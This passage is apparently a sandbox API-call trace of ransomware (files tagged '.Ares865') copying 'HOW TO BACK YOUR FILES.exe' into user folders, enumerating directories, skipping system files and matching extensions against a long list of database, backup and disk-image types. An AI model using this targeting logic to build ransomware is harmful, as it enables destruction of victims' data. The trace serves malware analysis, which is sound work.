Media\\12.0\\WMSDKNS.DTD") returned 77 [0060.586] lstrcpyW (in: lpString1=0x2cce484, lpString2="WMSDKNS.XML.Ares865" | out: lpString1="WMSDKNS.XML.Ares865") returned="WMSDKNS.XML.Ares865" [0060.586] lstrlenW (lpString="WMSDKNS.XML.Ares865") returned 19 [0060.586] lstrlenW (lpString="Ares865") returned 7 [0060.586] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0060.586] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2ad0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.XML.Ares865", cAlternateFileName="WMSDKN~1.ARE")) returned 0 [0060.586] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.586] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2288 [0060.586] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail" [0060.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0060.586] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0060.586] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned 59 [0060.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail" [0060.586] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.586] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.586] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.587] GetLastError () returned 0x0 [0060.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.587] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.587] CloseHandle (hObject=0x12c) returned 1 [0060.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.587] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.587] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.587] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.587] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.587] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.587] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.587] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.587] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6535940, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6535940, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf67dcad6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="aoldtz.exe") returned -1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".") returned 1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="..") returned 1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="windows") returned -1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="bootmgr") returned -1 [0060.587] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="temp") returned -1 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="pagefile.sys") returned -1 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="boot") returned -1 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="ids.txt") returned -1 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="ntuser.dat") returned -1 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="perflogs") returned -1 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2="MSBuild") returned -1 [0060.588] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0060.588] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\*") returned 61 [0060.588] lstrcpyW (in: lpString1=0x2cce478, lpString2="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" | out: lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" [0060.588] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0060.588] lstrlenW (lpString="Ares865") returned 7 [0060.588] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0060.588] lstrlenW (lpString=".dll") returned 4 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".dll") returned 1 [0060.588] lstrlenW (lpString=".lnk") returned 4 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".lnk") returned 1 [0060.588] lstrlenW (lpString=".ini") returned 4 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".ini") returned 1 [0060.588] lstrlenW (lpString=".sys") returned 4 [0060.588] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".sys") returned 1 [0060.588] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0060.588] lstrlenW (lpString="bak") returned 3 [0060.588] lstrcmpiW (lpString1="unt", lpString2="bak") returned 1 [0060.588] lstrlenW (lpString="ba_") returned 3 [0060.588] lstrcmpiW (lpString1="unt", lpString2="ba_") returned 1 [0060.588] lstrlenW (lpString="dbb") returned 3 [0060.588] lstrcmpiW (lpString1="unt", lpString2="dbb") returned 1 [0060.588] lstrlenW (lpString="vmdk") returned 4 [0060.588] lstrcmpiW (lpString1="ount", lpString2="vmdk") returned -1 [0060.588] lstrlenW (lpString="rar") returned 3 [0060.588] lstrcmpiW (lpString1="unt", lpString2="rar") returned 1 [0060.588] lstrlenW (lpString="zip") returned 3 [0060.588] lstrcmpiW (lpString1="unt", lpString2="zip") returned -1 [0060.588] lstrlenW (lpString="tgz") returned 3 [0060.588] lstrcmpiW (lpString1="unt", lpString2="tgz") returned 1 [0060.588] lstrlenW (lpString="vbox") returned 4 [0060.588] lstrcmpiW (lpString1="ount", lpString2="vbox") returned -1 [0060.588] lstrlenW (lpString="vdi") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="vdi") returned -1 [0060.589] lstrlenW (lpString="vhd") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="vhd") returned -1 [0060.589] lstrlenW (lpString="vhdx") returned 4 [0060.589] lstrcmpiW (lpString1="ount", lpString2="vhdx") returned -1 [0060.589] lstrlenW (lpString="avhd") returned 4 [0060.589] lstrcmpiW (lpString1="ount", lpString2="avhd") returned 1 [0060.589] lstrlenW (lpString="db") returned 2 [0060.589] lstrcmpiW (lpString1="nt", lpString2="db") returned 1 [0060.589] lstrlenW (lpString="db2") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="db2") returned 1 [0060.589] lstrlenW (lpString="db3") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="db3") returned 1 [0060.589] lstrlenW (lpString="dbf") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="dbf") returned 1 [0060.589] lstrlenW (lpString="mdf") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="mdf") returned 1 [0060.589] lstrlenW (lpString="mdb") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="mdb") returned 1 [0060.589] lstrlenW (lpString="sql") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="sql") returned 1 [0060.589] lstrlenW (lpString="sqlite") returned 6 [0060.589] lstrcmpiW (lpString1="ccount", lpString2="sqlite") returned -1 [0060.589] lstrlenW (lpString="sqlite3") returned 7 [0060.589] lstrcmpiW (lpString1="account", lpString2="sqlite3") returned -1 [0060.589] lstrlenW (lpString="sqlitedb") returned 8 [0060.589] lstrcmpiW (lpString1="eaccount", lpString2="sqlitedb") returned -1 [0060.589] lstrlenW (lpString="xml") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="xml") returned -1 [0060.589] lstrlenW (lpString="$er") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="$er") returned 1 [0060.589] lstrlenW (lpString="4dd") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="4dd") returned 1 [0060.589] lstrlenW (lpString="4dl") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="4dl") returned 1 [0060.589] lstrlenW (lpString="^^^") returned 3 [0060.589] lstrcmpiW (lpString1="unt", lpString2="^^^") returned 1 [0060.589] lstrlenW (lpString="abs") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="abs") returned 1 [0060.590] lstrlenW (lpString="abx") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="abx") returned 1 [0060.590] lstrlenW (lpString="accdb") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accdb") returned 1 [0060.590] lstrlenW (lpString="accdc") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accdc") returned 1 [0060.590] lstrlenW (lpString="accde") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accde") returned 1 [0060.590] lstrlenW (lpString="accdr") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accdr") returned 1 [0060.590] lstrlenW (lpString="accdt") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accdt") returned 1 [0060.590] lstrlenW (lpString="accdw") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accdw") returned 1 [0060.590] lstrlenW (lpString="accft") returned 5 [0060.590] lstrcmpiW (lpString1="count", lpString2="accft") returned 1 [0060.590] lstrlenW (lpString="adb") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0060.590] lstrlenW (lpString="adb") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0060.590] lstrlenW (lpString="ade") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="ade") returned 1 [0060.590] lstrlenW (lpString="adf") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="adf") returned 1 [0060.590] lstrlenW (lpString="adn") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="adn") returned 1 [0060.590] lstrlenW (lpString="adp") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="adp") returned 1 [0060.590] lstrlenW (lpString="alf") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="alf") returned 1 [0060.590] lstrlenW (lpString="ask") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="ask") returned 1 [0060.590] lstrlenW (lpString="btr") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="btr") returned 1 [0060.590] lstrlenW (lpString="cat") returned 3 [0060.590] lstrcmpiW (lpString1="unt", lpString2="cat") returned 1 [0060.591] lstrlenW (lpString="cdb") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="cdb") returned 1 [0060.591] lstrlenW (lpString="ckp") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="ckp") returned 1 [0060.591] lstrlenW (lpString="cma") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="cma") returned 1 [0060.591] lstrlenW (lpString="cpd") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="cpd") returned 1 [0060.591] lstrlenW (lpString="dacpac") returned 6 [0060.591] lstrcmpiW (lpString1="ccount", lpString2="dacpac") returned -1 [0060.591] lstrlenW (lpString="dad") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dad") returned 1 [0060.591] lstrlenW (lpString="dadiagrams") returned 10 [0060.591] lstrcmpiW (lpString1=".oeaccount", lpString2="dadiagrams") returned -1 [0060.591] lstrlenW (lpString="daschema") returned 8 [0060.591] lstrcmpiW (lpString1="eaccount", lpString2="daschema") returned 1 [0060.591] lstrlenW (lpString="db-journal") returned 10 [0060.591] lstrcmpiW (lpString1=".oeaccount", lpString2="db-journal") returned -1 [0060.591] lstrlenW (lpString="db-shm") returned 6 [0060.591] lstrcmpiW (lpString1="ccount", lpString2="db-shm") returned -1 [0060.591] lstrlenW (lpString="db-wal") returned 6 [0060.591] lstrcmpiW (lpString1="ccount", lpString2="db-wal") returned -1 [0060.591] lstrlenW (lpString="dbc") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dbc") returned 1 [0060.591] lstrlenW (lpString="dbs") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dbs") returned 1 [0060.591] lstrlenW (lpString="dbt") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dbt") returned 1 [0060.591] lstrlenW (lpString="dbv") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dbv") returned 1 [0060.591] lstrlenW (lpString="dbx") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dbx") returned 1 [0060.591] lstrlenW (lpString="dcb") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dcb") returned 1 [0060.591] lstrlenW (lpString="dct") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dct") returned 1 [0060.591] lstrlenW (lpString="dcx") returned 3 [0060.591] lstrcmpiW (lpString1="unt", lpString2="dcx") returned 1 [0060.592] lstrlenW (lpString="ddl") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="ddl") returned 1 [0060.592] lstrlenW (lpString="dlis") returned 4 [0060.592] lstrcmpiW (lpString1="ount", lpString2="dlis") returned 1 [0060.592] lstrlenW (lpString="dp1") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="dp1") returned 1 [0060.592] lstrlenW (lpString="dqy") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="dqy") returned 1 [0060.592] lstrlenW (lpString="dsk") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="dsk") returned 1 [0060.592] lstrlenW (lpString="dsn") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="dsn") returned 1 [0060.592] lstrlenW (lpString="dtsx") returned 4 [0060.592] lstrcmpiW (lpString1="ount", lpString2="dtsx") returned 1 [0060.592] lstrlenW (lpString="dxl") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="dxl") returned 1 [0060.592] lstrlenW (lpString="eco") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="eco") returned 1 [0060.592] lstrlenW (lpString="ecx") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="ecx") returned 1 [0060.592] lstrlenW (lpString="edb") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="edb") returned 1 [0060.592] lstrlenW (lpString="epim") returned 4 [0060.592] lstrcmpiW (lpString1="ount", lpString2="epim") returned 1 [0060.592] lstrlenW (lpString="fcd") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="fcd") returned 1 [0060.592] lstrlenW (lpString="fdb") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="fdb") returned 1 [0060.592] lstrlenW (lpString="fic") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="fic") returned 1 [0060.592] lstrlenW (lpString="flexolibrary") returned 12 [0060.592] lstrcmpiW (lpString1="C}.oeaccount", lpString2="flexolibrary") returned -1 [0060.592] lstrlenW (lpString="fm5") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="fm5") returned 1 [0060.592] lstrlenW (lpString="fmp") returned 3 [0060.592] lstrcmpiW (lpString1="unt", lpString2="fmp") returned 1 [0060.592] lstrlenW (lpString="fmp12") returned 5 [0060.592] lstrcmpiW (lpString1="count", lpString2="fmp12") returned -1 [0060.592] lstrlenW (lpString="fmpsl") returned 5 [0060.593] lstrcmpiW (lpString1="count", lpString2="fmpsl") returned -1 [0060.593] lstrlenW (lpString="fol") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="fol") returned 1 [0060.593] lstrlenW (lpString="fp3") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="fp3") returned 1 [0060.593] lstrlenW (lpString="fp4") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="fp4") returned 1 [0060.593] lstrlenW (lpString="fp5") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="fp5") returned 1 [0060.593] lstrlenW (lpString="fp7") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="fp7") returned 1 [0060.593] lstrlenW (lpString="fpt") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="fpt") returned 1 [0060.593] lstrlenW (lpString="frm") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="frm") returned 1 [0060.593] lstrlenW (lpString="gdb") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0060.593] lstrlenW (lpString="gdb") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="gdb") returned 1 [0060.593] lstrlenW (lpString="grdb") returned 4 [0060.593] lstrcmpiW (lpString1="ount", lpString2="grdb") returned 1 [0060.593] lstrlenW (lpString="gwi") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="gwi") returned 1 [0060.593] lstrlenW (lpString="hdb") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="hdb") returned 1 [0060.593] lstrlenW (lpString="his") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="his") returned 1 [0060.593] lstrlenW (lpString="ib") returned 2 [0060.593] lstrcmpiW (lpString1="nt", lpString2="ib") returned 1 [0060.593] lstrlenW (lpString="idb") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="idb") returned 1 [0060.593] lstrlenW (lpString="ihx") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="ihx") returned 1 [0060.593] lstrlenW (lpString="itdb") returned 4 [0060.593] lstrcmpiW (lpString1="ount", lpString2="itdb") returned 1 [0060.593] lstrlenW (lpString="itw") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="itw") returned 1 [0060.593] lstrlenW (lpString="jet") returned 3 [0060.593] lstrcmpiW (lpString1="unt", lpString2="jet") returned 1 [0060.594] lstrlenW (lpString="jtx") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="jtx") returned 1 [0060.594] lstrlenW (lpString="kdb") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="kdb") returned 1 [0060.594] lstrlenW (lpString="kexi") returned 4 [0060.594] lstrcmpiW (lpString1="ount", lpString2="kexi") returned 1 [0060.594] lstrlenW (lpString="kexic") returned 5 [0060.594] lstrcmpiW (lpString1="count", lpString2="kexic") returned -1 [0060.594] lstrlenW (lpString="kexis") returned 5 [0060.594] lstrcmpiW (lpString1="count", lpString2="kexis") returned -1 [0060.594] lstrlenW (lpString="lgc") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="lgc") returned 1 [0060.594] lstrlenW (lpString="lwx") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="lwx") returned 1 [0060.594] lstrlenW (lpString="maf") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="maf") returned 1 [0060.594] lstrlenW (lpString="maq") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="maq") returned 1 [0060.594] lstrlenW (lpString="mar") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mar") returned 1 [0060.594] lstrlenW (lpString="marshal") returned 7 [0060.594] lstrcmpiW (lpString1="account", lpString2="marshal") returned -1 [0060.594] lstrlenW (lpString="mas") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mas") returned 1 [0060.594] lstrlenW (lpString="mav") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mav") returned 1 [0060.594] lstrlenW (lpString="maw") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="maw") returned 1 [0060.594] lstrlenW (lpString="mdbhtml") returned 7 [0060.594] lstrcmpiW (lpString1="account", lpString2="mdbhtml") returned -1 [0060.594] lstrlenW (lpString="mdn") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mdn") returned 1 [0060.594] lstrlenW (lpString="mdt") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mdt") returned 1 [0060.594] lstrlenW (lpString="mfd") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mfd") returned 1 [0060.594] lstrlenW (lpString="mpd") returned 3 [0060.594] lstrcmpiW (lpString1="unt", lpString2="mpd") returned 1 [0060.595] lstrlenW (lpString="mrg") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="mrg") returned 1 [0060.595] lstrlenW (lpString="mud") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="mud") returned 1 [0060.595] lstrlenW (lpString="mwb") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="mwb") returned 1 [0060.595] lstrlenW (lpString="myd") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="myd") returned 1 [0060.595] lstrlenW (lpString="ndf") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="ndf") returned 1 [0060.595] lstrlenW (lpString="nnt") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="nnt") returned 1 [0060.595] lstrlenW (lpString="nrmlib") returned 6 [0060.595] lstrcmpiW (lpString1="ccount", lpString2="nrmlib") returned -1 [0060.595] lstrlenW (lpString="ns2") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="ns2") returned 1 [0060.595] lstrlenW (lpString="ns3") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="ns3") returned 1 [0060.595] lstrlenW (lpString="ns4") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="ns4") returned 1 [0060.595] lstrlenW (lpString="nsf") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="nsf") returned 1 [0060.595] lstrlenW (lpString="nv") returned 2 [0060.595] lstrcmpiW (lpString1="nt", lpString2="nv") returned -1 [0060.595] lstrlenW (lpString="nv2") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="nv2") returned 1 [0060.595] lstrlenW (lpString="nwdb") returned 4 [0060.595] lstrcmpiW (lpString1="ount", lpString2="nwdb") returned 1 [0060.595] lstrlenW (lpString="nyf") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="nyf") returned 1 [0060.595] lstrlenW (lpString="odb") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0060.595] lstrlenW (lpString="odb") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="odb") returned 1 [0060.595] lstrlenW (lpString="oqy") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="oqy") returned 1 [0060.595] lstrlenW (lpString="ora") returned 3 [0060.595] lstrcmpiW (lpString1="unt", lpString2="ora") returned 1 [0060.596] lstrlenW (lpString="orx") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="orx") returned 1 [0060.596] lstrlenW (lpString="owc") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="owc") returned 1 [0060.596] lstrlenW (lpString="p96") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="p96") returned 1 [0060.596] lstrlenW (lpString="p97") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="p97") returned 1 [0060.596] lstrlenW (lpString="pan") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="pan") returned 1 [0060.596] lstrlenW (lpString="pdb") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="pdb") returned 1 [0060.596] lstrlenW (lpString="pdm") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="pdm") returned 1 [0060.596] lstrlenW (lpString="pnz") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="pnz") returned 1 [0060.596] lstrlenW (lpString="qry") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="qry") returned 1 [0060.596] lstrlenW (lpString="qvd") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="qvd") returned 1 [0060.596] lstrlenW (lpString="rbf") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="rbf") returned 1 [0060.596] lstrlenW (lpString="rctd") returned 4 [0060.596] lstrcmpiW (lpString1="ount", lpString2="rctd") returned -1 [0060.596] lstrlenW (lpString="rod") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="rod") returned 1 [0060.596] lstrlenW (lpString="rodx") returned 4 [0060.596] lstrcmpiW (lpString1="ount", lpString2="rodx") returned -1 [0060.596] lstrlenW (lpString="rpd") returned 3 [0060.596] lstrcmpiW (lpString1="unt", lpString2="rpd") returned 1 [0060.596] lstrlenW 